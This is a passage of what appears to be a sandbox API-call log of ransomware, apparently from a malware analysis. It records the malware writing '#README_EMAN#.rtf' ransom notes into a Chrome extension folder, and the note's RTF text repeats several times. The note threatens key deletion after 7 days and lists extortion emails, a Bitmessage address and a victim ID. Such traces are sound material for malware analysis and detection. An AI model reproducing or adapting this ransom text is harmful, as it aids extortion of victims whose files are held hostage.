\\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x16Ùv#Q\x17ß÷\x1c,\x8eg»`Æ;ø\x89÷\x03%|…s¾", lpUsedDefaultChar=0x0) returned 8717 [0271.648] WriteFile (in: hFile=0x2ec, lpBuffer=0x23698d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23698d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.653] CloseHandle (hObject=0x2ec) returned 1 [0271.834] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\#readme_eman#.rtf")) returned 0xffffffff [0271.834] GetLastError () returned 0x2 [0271.834] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0271.881] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.881] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.881] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note 